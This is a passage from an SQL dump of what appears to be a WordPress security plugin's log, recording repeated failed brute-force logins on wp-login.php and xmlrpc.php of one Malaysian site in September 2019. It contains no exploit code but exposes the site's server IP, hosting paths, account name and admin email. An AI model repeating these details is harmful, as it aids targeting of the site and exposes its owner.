16:49:00',18256304,19554680,'https://bintara.com.my/xmlrpc.php',1,0,'162.241.232.229'),(24648,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"74.115.209.253\";s:11:\"REMOTE_PORT\";s:5:\"46198\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEQakViJhUiKk@yAoe8ZwAAAYw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568739434.5185\";s:12:\"REQUEST_TIME\";s:10:\"1568739434\";}}','notice','2019-09-17 16:57:16','2019-09-17 16:57:15',17739472,19231400,'https://bintara.com.my/wp-login.php',1,0,'74.115.209.253'),(24649,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"74.115.209.253\";s:11:\"REMOTE_PORT\";s:5:\"46758\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEQbn-mRYMgL5SYt2EQdQAAAUw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568739438.1879\";s:12:\"REQUEST_TIME\";s:10:\"1568739438\";}}','notice','2019-09-17 16:57:20','2019-09-17 16:57:18',18257344,19556920,'https://bintara.com.my/xmlrpc.php',1,0,'74.115.209.253'),(24650,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"146.185.183.107\";s:11:\"REMOTE_PORT\";s:5:\"43856\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYERWsptRwTKB9qWFzHgowAAAA4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568739674.8495\";s:12:\"REQUEST_TIME\";s:10:\"1568739674\";}}','notice','2019-09-17 17:01:16','2019-09-17 17:01:15',17740712,19229992,'https://bintara.com.my/wp-login.php',1,0,'146.185.183.107'),(24651,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"146.185.183.107\";s:11:\"REMOTE_PORT\";s:5:\"44624\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYERXUViJhUiKk@yAoe80AAAAZU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568739678.0249\";s:12:\"REQUEST_TIME\";s:10:\"1568739678\";}}','notice','2019-09-17 17:01:19','2019-09-17 17:01:18',18258376,19555792,'https://bintara.com.my/xmlrpc.php',1,0,'146.185.183.107'),(24652,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"149.202.95.126\";s:11:\"REMOTE_PORT\";s:5:\"58150\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYESxkViJhUiKk@yAoe9bwAAAYg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568740039.863\";s:12:\"REQUEST_TIME\";s:10:\"1568740039\";}}','notice','2019-09-17 17:07:23','2019-09-17 17:07:20',17740544,19231920,'https://bintara.com.my/wp-login.php',1,0,'149.202.95.126'),(24653,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"149.202.95.126\";s:11:\"REMOTE_PORT\";s:5:\"59960\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYESzX-mRYMgL5SYt2EQ-AAAAUQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568740046.8005\";s:12:\"REQUEST_TIME\";s:10:\"1568740046\";}}','notice','2019-09-17 17:07:29','2019-09-17 17:07:27',18257344,19556920,'https://bintara.com.my/xmlrpc.php',1,0,'149.202.95.126'),(24654,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"167.71.175.204\";s:11:\"REMOTE_PORT\";s:5:\"42666\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYETdkViJhUiKk@yAoe9ywAAAYU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568740214.8287\";s:12:\"REQUEST_TIME\";s:10:\"1568740214\";}}','notice','2019-09-17 17:10:16','2019-09-17 17:10:15',17740072,19230936,'https://bintara.com.my/wp-login.php',1,0,'167.71.175.204'),(24655,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"167.71.175.204\";s:11:\"REMOTE_PORT\";s:5:\"43194\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYETesptRwTKB9qWFzHg8gAAABg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568740218.4511\";s:12:\"REQUEST_TIME\";s:10:\"1568740218\";}}','notice','2019-09-17 17:10:20','2019-09-17 17:10:18',18257360,19556920,'https://bintara.com.my/xmlrpc.php',1,0,'167.71.175.204'),(24656,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"185.52.2.165\";s:11:\"REMOTE_PORT\";s:5:\"56256\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEVrkViJhUiKk@yAoe@7AAAAZA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568740782.4689\";s:12:\"REQUEST_TIME\";s:10:\"1568740782\";}}','notice','2019-09-17 17:19:43','2019-09-17 